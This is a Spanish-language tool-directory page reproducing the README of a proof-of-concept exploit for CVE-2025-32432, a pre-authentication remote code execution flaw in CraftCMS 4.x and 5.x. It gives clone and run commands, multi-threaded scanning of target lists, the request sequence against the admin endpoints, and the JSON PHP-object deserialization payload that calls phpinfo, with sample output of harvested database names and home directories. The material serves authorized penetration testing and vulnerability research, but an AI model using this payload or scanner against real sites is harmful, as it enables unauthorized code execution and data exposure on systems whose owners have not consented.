Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32432 — Este repositorio contiene un script de exploit de prueba de concepto para CVE-2025-32432, una vulnerabilidad de Ejecución Remota de Código (RCE) de pre-autenticación que afecta a CraftCMS versiones 4.x y 5.x. La vulnerabilidad existe en la función de generación de transformación de activos de CraftCMS. | Kitploit
Herramientas/GitHubGitHub/sachinart/cve-2025-32432
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubsachinart/cve-2025-32432

CVE-2025-32432

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Este repositorio contiene un script de exploit de prueba de concepto para CVE-2025-32432, una vulnerabilidad de Ejecución Remota de Código (RCE) de pre-autenticación que afecta a CraftCMS versiones 4.x y 5.x. La vulnerabilidad existe en la función de generación de transformación de activos de CraftCMS.

274hace 1 añoRevisado por Kitploit
Compartir

Exploit de CraftCMS CVE-2025-32432 por Chirag Artani

Resumen

Este repositorio contiene un script de prueba de concepto para CVE-2025-32432, una vulnerabilidad de ejecución remota de código (RCE) sin autenticación que afecta a CraftCMS versiones 4.x y 5.x. La vulnerabilidad existe en la función de generación de transformación de activos de CraftCMS.

Este script de exploit automatiza la detección y verificación de la vulnerabilidad mediante:

  1. Extracción de tokens CSRF del panel de administración de CraftCMS
  2. Explotación de la vulnerabilidad mediante inyección de objetos PHP
  3. Verificación de explotación exitosa extrayendo información del sistema

Descargo de responsabilidad

⚠️ Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

Utilice esta herramienta solo contra sistemas para los cuales tenga permiso explícito de prueba. Probar sin permiso sistemas sin autorización es ilegal y poco ético.

Características

  • Soporte tanto para escaneo de objetivo único como de múltiples objetivos (basado en archivo)
  • Capacidad de subprocesos múltiples para escaneo más rápido de múltiples objetivos
  • Salida detallada que incluye nombre de base de datos e información del directorio home
  • Generación de informe CSV para objetivos vulnerables
  • Omisión de verificación SSL para pruebas con certificados autofirmados
  • Manejo robusto de errores

Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Instalar dependencias requeridas
pip install -r requirements.txt

Requisitos

  • Python 3.6+
  • Paquetes Python requeridos (ver requirements.txt):
    • requests
    • beautifulsoup4
    • urllib3

Uso

Objetivo único

Para escanear un único objetivo:

root@kitploit:~
python3 craftcms_rce.py -u example.com

Múltiples objetivos

Para escanear múltiples objetivos desde un archivo (una URL por línea):

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

Donde -t especifica el número de hilos a usar (por defecto es 5).

Opciones

root@kitploit:~
-u, --url     URL única a probar
-f, --file    Archivo que contiene URLs a probar (una por línea)
-t, --threads Número de hilos (por defecto: 5)
-h, --help    Mostrar mensaje de ayuda y salir

Salida

El script mostrará resultados en la consola y guardará los objetivos vulnerables en vulnerable.txt en formato CSV con las siguientes columnas:

  • URL
  • Valor de CRAFT_DB_DATABASE (nombre de la base de datos)
  • Ruta del directorio HOME
  • Otra información del sistema

Ejemplo de salida en consola:

root@kitploit:~
[*] Probando objetivo único: https://example.com
[*] Iniciando escaneo con 5 hilos
[+] VULNERABLE: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== RESUMEN DEL ESCANEO ===
Total de URLs escaneadas: 1
Sitios vulnerables: 1
Resultados detallados guardados en vulnerable.txt

Cómo funciona la vulnerabilidad

Esta vulnerabilidad explota un problema de deserialización en CraftCMS. El exploit:

  1. Realiza una solicitud GET a /index.php?p=admin/dashboard para obtener un token CSRF
  2. Envía una solicitud POST a /index.php?p=admin/actions/assets/generate-transform con un payload JSON especialmente diseñado
  3. El payload incluye un objeto PHP que se deserializa, lo que lleva a ejecución de código arbitrario a través de la clase GuzzleHttp\Psr7\FnStream
  4. La explotación exitosa se verifica ejecutando phpinfo() y extrayendo información específica del sistema

Detalles técnicos

El exploit aprovecha una deserialización insegura en el proceso de generación de transformación de activos. La ruta de código vulnerable permite a un atacante inyectar un objeto PHP personalizado que se deserializa, lo que lleva a ejecución de código arbitrario.

Los componentes clave del payload:

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

Contribuciones

¡Las contribuciones, problemas y solicitudes de funciones son bienvenidas! No dudes en visitar la página de issues.

Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.

Referencias

  • Detalles de CVE-2025-32432
  • Aviso de seguridad de CraftCMS

Autor

  • Nicolas Bourras (Orange Cyberdefense) - Descubrimiento original de la vulnerabilidad
  • Chirag Artani - Autor del script de exploit
Descargar herramienta